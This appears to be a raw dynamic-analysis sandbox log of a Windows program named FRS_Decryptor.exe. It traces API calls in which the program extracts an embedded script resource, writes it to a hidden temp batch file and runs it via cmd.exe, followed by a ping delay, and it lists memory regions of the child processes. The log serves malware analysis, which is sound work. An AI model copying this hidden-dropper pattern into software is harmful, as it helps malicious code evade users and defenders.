[0068.362] GetCurrentThreadId () returned 0x510 [0068.362] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1d60000 [0068.363] GetEnvironmentVariableA (in: lpName="TMP", lpBuffer=0x1e98ce8, nSize=0xff | out: lpBuffer="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp") returned 0x24 [0068.363] GetFileAttributesA (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp")) returned 0x10 [0068.363] GetFullPathNameA (in: lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp", nBufferLength=0x1000, lpBuffer=0x18ef14, lpFilePart=0x18ef10 | out: lpBuffer="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp", lpFilePart=0x18ef10*="Temp") returned 0x24 [0068.363] FindResourceA (hModule=0x400000, lpName="SETT", lpType=0xa) returned 0x40e190 [0068.363] LoadResource (hModule=0x400000, hResInfo=0x40e190) returned 0x452094 [0068.363] LockResource (hResData=0x452094) returned 0x452094 [0068.363] SizeofResource (hModule=0x400000, hResInfo=0x40e190) returned 0x30 [0068.363] SizeofResource (hModule=0x400000, hResInfo=0x40e190) returned 0x30 [0068.363] FreeResource (hResData=0x452094) returned 0 [0068.363] GetCurrentProcessId () returned 0x94c [0068.363] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff38 | out: lpPerformanceCount=0x18ff38*=482310729) returned 1 [0068.363] GetFileAttributesA (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat")) returned 0xffffffff [0068.363] FindResourceA (hModule=0x400000, lpName="SCRIPT", lpType=0xa) returned 0x40e180 [0068.363] LoadResource (hModule=0x400000, hResInfo=0x40e180) returned 0x450294 [0068.363] LockResource (hResData=0x450294) returned 0x450294 [0068.363] SizeofResource (hModule=0x400000, hResInfo=0x40e180) returned 0x1e00 [0068.364] SizeofResource (hModule=0x400000, hResInfo=0x40e180) returned 0x1e00 [0068.364] CreateFileA (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.364] WriteFile (in: hFile=0xa0, lpBuffer=0x1e72ea0*, nNumberOfBytesToWrite=0x1df5, lpNumberOfBytesWritten=0x409918, lpOverlapped=0x0 | out: lpBuffer=0x1e72ea0*, lpNumberOfBytesWritten=0x409918*=0x1df5, lpOverlapped=0x0) returned 1 [0068.365] CloseHandle (hObject=0xa0) returned 1 [0068.365] FreeResource (hResData=0x450294) returned 0 [0068.365] SetFileAttributesA (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat", dwFileAttributes=0x102) returned 1 [0068.366] GetCommandLineA () returned="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe " [0068.366] SetEnvironmentVariableA (lpName="cmdln", lpValue="") returned 1 [0068.366] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c \"\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat\" C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x20, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x409924*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x409968 | out: lpCommandLine="cmd.exe /c \"\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat\" C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe \"", lpProcessInformation=0x409968*(hProcess=0xa4, hThread=0xa0, dwProcessId=0x958, dwThreadId=0x984)) returned 1 [0068.379] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) Process: id = "41" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1314f000" os_pid = "0x9cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0x94c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff" cur_dir = "C:\\Windows" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1903 start_va = 0x7f537000 end_va = 0x7f537fff entry_point = 0x0 region_type = private name = "private_0x000000007f537000" filename = "" Region: id = 1904 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1905 start_va = 0x23dcfe0000 end_va = 0x23dcffffff entry_point = 0x0 region_type = private name = "private_0x00000023dcfe0000" filename = "" Region: id = 1906 start_va = 0x23dd000000 end_va = 0x23dd00efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000023dd000000" filename = "" Region: id = 1907 start_va = 0x23dd010000 end_va = 0x23dd04ffff entry_point = 0x0 region_type = private name = "private_0x00000023dd010000" filename = "" Region: id = 1908 start_va = 0x7ff6c6b50000 end_va = 0x7ff6c6b72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c6b50000" filename = "" Region: id = 1909 start_va = 0x7ff6c6b78000 end_va = 0x7ff6c6b78fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c6b78000" filename = "" Region: id = 1910 start_va = 0x7ff6c6b7e000 end_va = 0x7ff6c6b7ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c6b7e000" filename = "" Region: id = 1911 start_va = 0x7ff6c78b0000 end_va = 0x7ff6c790bfff entry_point = 0x7ff6c78b0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1912 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1913 start_va = 0x23dd240000 end_va = 0x23dd33ffff entry_point = 0x0 region_type = private name = "private_0x00000023dd240000" filename = "" Region: id = 1914 start_va = 0x7ffb1ada0000 end_va = 0x7ffb1aeaffff entry_point = 0x7ffb1ada0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1915 start_va = 0x7ffb1b140000 end_va = 0x7ffb1b279fff entry_point = 0x7ffb1b140000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1916 start_va = 0x23dcfe0000 end_va = 0x23dcfeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000023dcfe0000" filename = "" Region: id = 1917 start_va = 0x23dcff0000 end_va = 0x23dcff6fff entry_point = 0x0 region_type = private name = "private_0x00000023dcff0000" filename = "" Region: id = 1918 start_va = 0x23dd050000 end_va = 0x23dd0cdfff entry_point = 0x23dd050000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1919 start_va = 0x23dd0d0000 end_va = 0x23dd0d6fff entry_point = 0x0 region_type = private name = "private_0x00000023dd0d0000" filename = "" Region: id = 1920 start_va = 0x23dd0e0000 end_va = 0x23dd0e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000023dd0e0000" filename = "" Region: id = 1921 start_va = 0x23dd0f0000 end_va = 0x23dd0f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000023dd0f0000" filename = "" Region: id = 1922 start_va = 0x23dd100000 end_va = 0x23dd100fff entry_point = 0x0 region_type = private name = "private_0x00000023dd100000" filename = "" Region: id = 1923 start_va = 0x23dd110000 end_va = 0x23dd110fff entry_point = 0x0 region_type = private name = "private_0x00000023dd110000" filename = "" Region: id = 1924 start_va = 0x23dd230000 end_va = 0x23dd23ffff entry_point = 0x0 region_type = private name = "private_0x00000023dd230000" filename = "" Region: id = 1925 start_va = 0x23dd340000 end_va = 0x23dd4c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000023dd340000" filename = "" Region: id = 1926 start_va = 0x23dd4d0000 end_va = 0x23dd650fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000023dd4d0000" filename = "" Region: id = 1927 start_va = 0x23dd660000 end_va = 0x23dea5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000023dd660000" filename = "" Region: id = 1928 start_va = 0x23dea60000 end_va = 0x23dee5bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000023dea60000" filename = "" Region: id = 1929 start_va = 0x7ff6c6a50000 end_va = 0x7ff6c6b4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c6a50000" filename = "" Region: id = 1930 start_va = 0x7ffb1af60000 end_va = 0x7ffb1b006fff entry_point = 0x7ffb1af60000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1931 start_va = 0x7ffb1b070000 end_va = 0x7ffb1b126fff entry_point = 0x7ffb1b070000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1932 start_va = 0x7ffb1b410000 end_va = 0x7ffb1b580fff entry_point = 0x7ffb1b410000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1933 start_va = 0x7ffb1b590000 end_va = 0x7ffb1b6c8fff entry_point = 0x7ffb1b590000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1934 start_va = 0x7ffb1b870000 end_va = 0x7ffb1ba45fff entry_point = 0x7ffb1b870000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1935 start_va = 0x7ffb1d2f0000 end_va = 0x7ffb1d323fff entry_point = 0x7ffb1d2f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1936 start_va = 0x7ffb1d450000 end_va = 0x7ffb1d594fff entry_point = 0x7ffb1d450000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1937 start_va = 0x7ffb1d5a0000 end_va = 0x7ffb1d6d5fff entry_point = 0x7ffb1d5a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1960 start_va = 0x23dd010000 end_va = 0x23dd013fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000023dd010000" filename = "" Region: id = 1961 start_va = 0x23dd020000 end_va = 0x23dd026fff entry_point = 0x0 region_type = private name = "private_0x00000023dd020000" filename = "" Region: id = 1962 start_va = 0x23dd030000 end_va = 0x23dd033fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000023dd030000" filename = "" Region: id = 1963 start_va = 0x23dd040000 end_va = 0x23dd044fff entry_point = 0x23dd040000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1964 start_va = 0x23dd120000 end_va = 0x23dd15ffff entry_point = 0x0 region_type = private name = "private_0x00000023dd120000" filename = "" Region: id = 1965 start_va = 0x23dd160000 end_va = 0x23dd19ffff entry_point = 0x0 region_type = private name = "private_0x00000023dd160000" filename = "" Region: id = 1966 start_va = 0x23dd1a0000 end_va = 0x23dd1a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000023dd1a0000" filename = "" Region: id = 1967 start_va = 0x23dd1c0000 end_va = 0x23dd1c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000023dd1c0000" filename = "" Region: id = 1968 start_va = 0x23dee60000 end_va = 0x23def50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000023dee60000" filename = "" Region: id = 1969 start_va = 0x23defa0000 end_va = 0x23defaffff entry_point = 0x0 region_type = private name = "private_0x00000023defa0000" filename = "" Region: id = 1970 start_va = 0x23defb0000 end_va = 0x23df284fff entry_point = 0x23defb0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1971 start_va = 0x7ff6c6b7c000 end_va = 0x7ff6c6b7dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c6b7c000" filename = "" Region: id = 1972 start_va = 0x7ffb18f20000 end_va = 0x7ffb19179fff entry_point = 0x7ffb18f20000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17031_none_6242a4b3ecbb55a1\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17031_none_6242a4b3ecbb55a1\\comctl32.dll") Region: id = 1973 start_va = 0x7ffb19210000 end_va = 0x7ffb1922ffff entry_point = 0x7ffb19210000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1974 start_va = 0x7ffb197a0000 end_va = 0x7ffb198c0fff entry_point = 0x7ffb197a0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1975 start_va = 0x7ffb1b290000 end_va = 0x7ffb1b407fff entry_point = 0x7ffb1b290000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1976 start_va = 0x7ffb1ba50000 end_va = 0x7ffb1baa6fff entry_point = 0x7ffb1ba50000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1977 start_va = 0x7ffb19920000 end_va = 0x7ffb19929fff entry_point = 0x7ffb19920000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1978 start_va = 0x7ffb1a860000 end_va = 0x7ffb1a8bffff entry_point = 0x7ffb1a860000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1979 start_va = 0x7ffb1a9c0000 end_va = 0x7ffb1a9c9fff entry_point = 0x7ffb1a9c0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Thread: id = 83 os_tid = 0x37c Thread: id = 85 os_tid = 0x304 Thread: id = 87 os_tid = 0xfc Process: id = "42" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x5e7f000" os_pid = "0x968" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1885 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 1886 start_va = 0xa80000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 1887 start_va = 0xaa0000 end_va = 0xaa1fff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 1888 start_va = 0xab0000 end_va = 0xabefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 1889 start_va = 0xac0000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 1890 start_va = 0xb00000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 1891 start_va = 0xb40000 end_va = 0xb43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 1892 start_va = 0xb50000 end_va = 0xb50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 1893 start_va = 0xb60000 end_va = 0xb61fff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 1894 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1895 start_va = 0x7e860000 end_va = 0x7e882fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e860000" filename = "" Region: id = 1896 start_va = 0x7e886000 end_va = 0x7e886fff entry_point = 0x0 region_type = private name = "private_0x000000007e886000" filename = "" Region: id = 1897 start_va = 0x7e88c000 end_va = 0x7e88efff entry_point = 0x0 region_type = private name = "private_0x000000007e88c000" filename = "" Region: id = 1898 start_va = 0x7e88f000 end_va = 0x7e88ffff entry_point = 0x0 region_type = private name = "private_0x000000007e88f000" filename = "" Region: id = 1899 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1900 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1901 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1902 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 1938 start_va = 0xd50000 end_va = 0xd5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 1939 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1940 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1941 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1942 start_va = 0xa80000 end_va = 0xa8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 1943 start_va = 0xa90000 end_va = 0xa93fff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 1944 start_va = 0xb70000 end_va = 0xbedfff entry_point = 0xb70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1945 start_va = 0xc00000 end_va = 0xc0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 1946 start_va = 0xeb0000 end_va = 0xfaffff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 1947 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1948 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1949 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1950 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1951 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1952 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1953 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1954 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1955 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1956 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1957 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1958 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1959 start_va = 0x7e760000 end_va = 0x7e85ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e760000" filename = "" Region: id = 2028 start_va = 0xc10000 end_va = 0xc4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 2029 start_va = 0xc50000 end_va = 0xc8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 2030 start_va = 0x7e889000 end_va = 0x7e88bfff entry_point = 0x0 region_type = private name = "private_0x000000007e889000" filename = "" Region: id = 2031 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 2032 start_va = 0xaa0000 end_va = 0xaa2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 2033 start_va = 0xbf0000 end_va = 0xbf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bf0000" filename = "" Region: id = 2034 start_va = 0xc90000 end_va = 0xc92fff entry_point = 0xc90000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 2210 start_va = 0xca0000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 2211 start_va = 0xce0000 end_va = 0xd1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 2212 start_va = 0x7e883000 end_va = 0x7e885fff entry_point = 0x0 region_type = private name = "private_0x000000007e883000" filename = "" Thread: id = 84 os_tid = 0x12c [0068.046] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0068.047] __set_app_type (_Type=0x1) [0068.047] __p__fmode () returned 0x76ea1768 [0068.047] __p__commode () returned 0x76ea176c [0068.047] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0068.047] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0068.047] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.049] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.049] _fileno (_File=0x76ea4c28) returned 1 [0068.049] _get_osfhandle (_FileHandle=1) returned 0x28 [0068.049] GetFileType (hFile=0x28) returned 0x2 [0068.049] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xb3f010 | out: lpMode=0xb3f010) returned 0 [0068.049] GetLastError () returned 0x6 [0068.049] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xb3ef74, nSize=0x50 | out: lpBuffer="䤐ë") returned 0x0 [0068.049] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0068.053] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xb3f02c | out: phkResult=0xb3f02c*=0x88) returned 0x0 [0068.053] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xb3f020, lpData=0xb3f028, lpcbData=0xb3f024*=0x4 | out: lpType=0xb3f020*=0x0, lpData=0xb3f028*=0x0, lpcbData=0xb3f024*=0x4) returned 0x2 [0068.053] RegCloseKey (hKey=0x88) returned 0x0 [0068.054] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0xb3eff0*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb3f02c | out: ppResult=0xb3f02c*=0xebc228*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xeb8a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0068.054] FreeAddrInfoW (pAddrInfo=0xebc228*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xeb8a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) 